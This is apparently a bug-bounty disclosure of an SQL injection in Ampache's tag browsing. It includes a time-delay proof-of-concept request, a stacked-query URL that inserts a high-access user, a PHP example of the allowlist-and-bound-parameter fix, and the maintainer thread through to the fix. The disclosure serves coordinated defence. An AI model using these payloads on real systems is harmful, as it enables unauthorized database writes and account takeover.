SQL Injection in ampache/ampache

Valid

Reported on Oct 5th 2021


Description

The application does not validate and escape the type parameter before using it in a SQL statement in Model/Tag.php, leading to SQL injection.

Proof of Concept

Time delay:

GET /browse.php?action=tag&type=0%27or(if(now()=sysdate(),sleep(3),0))or%27 HTTP/1.1
Host: demo.ampache.dev
sec-ch-ua: "Chromium";v="89", ";Not A Brand";v="99"
sec-ch-ua-mobile: ?0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

Impact

The vulnerability allows unauthenticated users to perform SQL injection. A successful attack may result in the deletion of entire tables and, in certain cases, in the attacker gaining administrative rights to a database, writing files to the server leading to remote code execution, or writing a script to extract data.
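The class of fix the description calls for, as an added example that is not part of the original report and is not Ampache's code: the request value is checked against an allowlist and then bound as a parameter instead of being concatenated. The function names, the allowlist, and the tag_map table layout are assumptions for illustration; the hostile input is the URL-decoded type value from the proof of concept above.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist of object types a tag browse may filter on (assumption).
const TAG_OBJECT_TYPES = ['artist', 'album', 'song', 'video'];

// Vulnerable shape described in the report: the request value is concatenated
// into the statement, so a quote in `type` changes the query structure.
function tag_sql_concatenated(string $type): string
{
    return "SELECT tag_id FROM tag_map WHERE object_type = '" . $type . "'";
}

// Hardened shape: reject anything outside the allowlist, then bind the value
// so the database never parses it as SQL.
function tag_ids_for_type(PDO $db, string $type): array
{
    if (!in_array($type, TAG_OBJECT_TYPES, true)) {
        return []; // unknown type: no query is issued at all
    }
    $stmt = $db->prepare(
        'SELECT tag_id FROM tag_map WHERE object_type = :type ORDER BY tag_id'
    );
    $stmt->execute([':type' => $type]);
    return array_map('intval', $stmt->fetchAll(PDO::FETCH_COLUMN));
}

// Constructed sample data in an in-memory SQLite database (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE tag_map (tag_id INTEGER, object_type TEXT)');
$db->exec("INSERT INTO tag_map VALUES (1, 'song'), (2, 'album'), (3, 'song')");

// The `type` value from the proof of concept, URL-decoded.
$hostile = "0'or(if(now()=sysdate(),sleep(3),0))or'";

// Concatenation: the leading quote closes the string literal early and the
// rest of the input becomes part of the SQL expression.
echo tag_sql_concatenated($hostile), PHP_EOL;

// Allowlist plus bound parameter: a valid type returns rows, the hostile
// value is rejected before any statement is prepared.
var_dump(tag_ids_for_type($db, 'song'));
var_dump(tag_ids_for_type($db, $hostile));
```

Against MySQL, also setting PDO::ATTR_EMULATE_PREPARES to false makes the server, not the client library, handle the bound value.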

We have contacted a member of the ampache team and are waiting to hear back 2 years ago
lachlan
2 years ago

I've replied to your email. Do you have a better attack link? This doesn't seem to affect the demo site.

laladee
2 years ago

Researcher


Hi, this is an example of a slow query attack. You can try it with a "stacked query" payload: https://demo.ampache.dev/browse.php?action=tag&type=1%27%3b+INSERT+INTO+user+(username,access)+VALUES+(%27Laladee%27,%27100%27)%3b%27

You can check it out: a new user named "Laladee" was successfully added.

lachlan validated this vulnerability 2 years ago
laladee has been awarded the disclosure bounty
The fix bounty is now up for grabs
lachlan
2 years ago

Fixed in the develop.ampache.dev page now.

lachlan marked this as fixed with commit 6d21e4 2 years ago
lachlan has been awarded the fix bounty
This vulnerability will not receive a CVE